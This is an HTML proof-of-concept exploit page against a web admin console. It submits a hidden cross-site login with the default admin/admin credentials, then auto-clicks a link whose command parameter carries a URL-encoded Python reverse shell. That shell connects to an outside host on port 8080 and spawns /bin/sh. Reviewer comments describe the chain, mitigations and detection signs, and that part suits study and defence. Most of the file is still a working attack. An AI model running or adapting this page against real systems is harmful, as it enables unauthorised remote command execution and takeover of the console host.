exploit.html
<!--
  Proof-of-concept page for a chained cross-site request attack on a web admin
  console (host redacted as X.X.X.X). When a browser loads this page it:
    1. auto-submits a hidden login form with username/password admin/admin to
       ZMC_Admin_Login (a cross-site login, i.e. login CSRF), then
    2. five seconds later requests ZMC_Admin_Advanced with a `command` parameter
       that carries a shell pipeline.

  NOTE(review): the following is inferred from the PoC, not shown on this page.
  For the chain to succeed the console would have to (a) still have the default
  admin/admin account, (b) accept the login POST and the state-changing GET
  cross-origin without an anti-CSRF token, and (c) pass `command` to a shell.

  Mitigations: change the default credentials; require a per-session CSRF token
  (and check Origin/Referer) on login and on every admin action; set SameSite on
  session cookies; accept state changes via POST only; never hand request
  parameters to a shell.
  Because both requests are sent by the victim's browser, restricting the
  console to an internal network does not by itself stop this.
-->
<html>
<body> <!-- Step 1: cross-site login (login CSRF) with the default admin/admin credentials -->
<!-- Hidden form posted to the console's login endpoint; target="_blank" sends the response to a new tab -->
<form target="_blank" action="https://X.X.X.X/ZMC_Admin_Login?cookies_checked=1" method="POST">
<!-- login, last_page, submit and JS_SWITCH presumably mirror the console's real login form; confirm against the product -->
<input type="hidden" name="login" value="AEE" />
<input type="hidden" name="last_page" value="" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="submit" value="Login" />
<input type="hidden" name="JS_SWITCH" value="JS_ON" />
<!-- Submit control with an empty label; the script below clicks it, so no user interaction is needed -->
<input id=prepare type="submit" value="" />
</form>
<!-- Step 2: once the browser holds an authenticated session, send the command-execution request -->
<!--
  Link with no text, clicked by the script. It is a plain GET to ZMC_Admin_Advanced
  (form=adminTasks, action=Apply). The URL-encoded `command` value is `echo -a`
  piped into a Python one-liner that opens a TCP connection to the host named in
  the payload on port 8080, duplicates the socket onto file descriptors 0, 1 and 2
  and runs /bin/sh -i, i.e. a reverse shell.
  Detection: requests to ZMC_Admin_Advanced whose `command` contains shell
  metacharacters or an interpreter invocation (query strings are typically in the
  web access log), especially with a foreign Referer; unexpected outbound
  connections from the console host.
-->
<a id=boom target="_blank" href='https://X.X.X.X/ZMC_Admin_Advanced?form=adminTasks&action=Apply&command=echo%20-a|python%20-c%20%27import%20socket%2csubprocess%2cos%3bs%3dsocket%2esocket%28socket%2eAF_INET%2csocket%2eSOCK_STREAM%29%3bs%2econnect%28%28"s3cur3%2eeu"%2c8080%29%29%3bos%2edup2%28s%2efileno%28%29%2c0%29%3bos%2edup2%28s%2efileno%28%29%2c1%29%3bos%2edup2%28s%2efileno%28%29%2c2%29%3bp%3dsubprocess%2ecall%28%5b"%2fbin%2fsh"%2c"-i"%5d%29%3b%27'></a>
<script>
// Runs as soon as the page is parsed: submits the login form without user input.
document.getElementById("prepare").click();
// Returns a Promise that resolves after `milliseconds` ms (setTimeout wrapper).
function Sleep(milliseconds) {
return new Promise(resolve => setTimeout(resolve, milliseconds));
}
// Waits, then clicks the link above so the second request follows the login.
async function exploit() {
await Sleep(5000); // Fixed 5 s delay so the login request can complete before the second request is sent
document.getElementById("boom").click();
}
exploit();
</script>
</body>
</html>